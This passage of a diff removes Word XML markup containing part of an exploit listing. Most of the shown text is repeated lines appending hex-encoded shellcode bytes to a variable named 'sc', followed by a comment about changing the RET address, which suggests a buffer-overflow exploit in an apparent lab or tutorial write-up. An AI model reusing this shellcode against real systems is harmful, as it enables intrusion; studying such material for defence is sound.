-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x2f\x9a\x8b\x44"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x8b\xe0\xf9\xb7"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\xb1\x95\x1d\x69"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x99\x49\xc6\xb9"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x56\x2d\x02\xb0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x57\xc7\x91\xb3"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x33\x38\x91\xb7"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x25\x51\x86\xe0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x3f\xef\x69\x67"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x42\x20\xc3\xe1"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\xeb\x58\xe6\xf0"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x99\x69\xc2\x88"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x13\x1c\xaa\x4d"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:val="pt-BR"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x99\xcf\x3d\x95"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>sc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x99\</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>xcc</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t>\xc2"</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
-              <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
-              <w:spacing w:line="240" w:lineRule="auto"/>
-              <w:jc w:val="both"/>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="None"/>
-                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-              </w:rPr>
-              <w:t># Change RET address if need be.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:pStyle w:val="BodyA"/>
-              <w:pBdr>
-                <w:top w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:left w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-                <w:right w:val="single" w:sz="4" w:space="0" w:color="D9D9D9"/>
-              </w:pBdr>
